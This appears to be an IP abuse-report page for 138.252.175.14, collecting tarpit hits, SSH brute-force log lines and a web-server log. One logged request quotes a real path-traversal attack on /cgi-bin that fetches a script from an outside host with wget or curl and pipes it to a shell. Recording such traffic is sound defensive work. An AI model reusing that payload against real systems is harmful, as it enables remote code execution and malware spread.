This IP address has been reported a total of
220
times from
155 distinct
sources.
138.252.175.14 was first reported on
, and the most recent report was
.
Recent Reports:
We have received reports of abusive activity from this IP address within the last week. It is
potentially still actively engaged in abusive activities.
138.252.175.14 fell into Endlessh tarpit; 0/1 total connections are currently still open. Total time ...
show more138.252.175.14 fell into Endlessh tarpit; 0/1 total connections are currently still open. Total time wasted: 1m 32s. Total bytes sent by tarpit: 12.00KiB. Report generated by Endlessh Report Generator v1.2.3
show less
138.252.175.14 fell into Endlessh tarpit; 0/1 total connections are currently still open. Total time ...
show more138.252.175.14 fell into Endlessh tarpit; 0/1 total connections are currently still open. Total time wasted: 1m 32s. Total bytes sent by tarpit: 12.00KiB. Report generated by Endlessh Report Generator v1.2.3
show less
138.252.175.14 fell into Endlessh tarpit; 0/1 total connections are currently still open. Total time ...
show more138.252.175.14 fell into Endlessh tarpit; 0/1 total connections are currently still open. Total time wasted: 1m 32s. Total bytes sent by tarpit: 12.00KiB. Report generated by Endlessh Report Generator v1.2.3
show less
138.252.175.14 fell into Endlessh tarpit; 0/1 total connections are currently still open. Total time ...
show more138.252.175.14 fell into Endlessh tarpit; 0/1 total connections are currently still open. Total time wasted: 1m 32s. Total bytes sent by tarpit: 12.00KiB. Report generated by Endlessh Report Generator v1.2.3
show less
ThreatBook Intelligence: Zombie,Spam more details on https://threatbook.io/ip/138.252.175.14
2026-04 ...
show moreThreatBook Intelligence: Zombie,Spam more details on https://threatbook.io/ip/138.252.175.14
2026-04-27 01:06:50 /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh,{"body":"(wget --no-check-certificate -qO- https://204.76.203.196/sh || curl -sk https://204.76.203.196/sh) | sh -s apache.selfrep","content_type":"text/plain","header":{"Accept":["*/*"],"Connection":["keep-alive"],"Content-Length":["121"],"Content-Type":["text/plain"],"Upgrade-Insecure-Requests":["1"],"User-Agent":["libredtail-http"]},"host":"60.204.175.106:443","method":"POST","proto":"HTTP/1.1","remote_addr":"138.252.175.14:41628","status_code":200,"url":"/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh","user_agent":"libredtail-http"}
show less
2026-04-27T06:37:59.485668+00:00 NBG-VS01-WebServer sshd-session[1946929]: pam_unix(sshd:auth): auth ...
show more2026-04-27T06:37:59.485668+00:00 NBG-VS01-WebServer sshd-session[1946929]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.252.175.14
2026-04-27T06:38:01.678258+00:00 NBG-VS01-WebServer sshd-session[1946929]: Failed password for invalid user admin from 138.252.175.14 port 49494 ssh2
2026-04-27T06:38:33.301711+00:00 NBG-VS01-WebServer sshd-session[1947178]: Invalid user orangepi from 138.252.175.14 port 58872
...
show less
2026-04-27T02:23:43.029955-04:00 debian sshd[2990930]: Invalid user orangepi from 138.252.175.14 por ...
show more2026-04-27T02:23:43.029955-04:00 debian sshd[2990930]: Invalid user orangepi from 138.252.175.14 port 41266
2026-04-27T02:23:43.033533-04:00 debian sshd[2990930]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.252.175.14
2026-04-27T02:23:44.675957-04:00 debian sshd[2990930]: Failed password for invalid user orangepi from 138.252.175.14 port 41266 ssh2
2026-04-27T02:24:36.162625-04:00 debian sshd[2991197]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.252.175.14 user=root
2026-04-27T02:24:38.080205-04:00 debian sshd[2991197]: Failed password for root from 138.252.175.14 port 45186 ssh2
...
show less
Brute-Force
SSH
Showing 1 to
15
of 220 reports
Think this IP has been falsely reported? You may request to have the associated
reports reviewed and removed.
Request Takedown ๐ฉ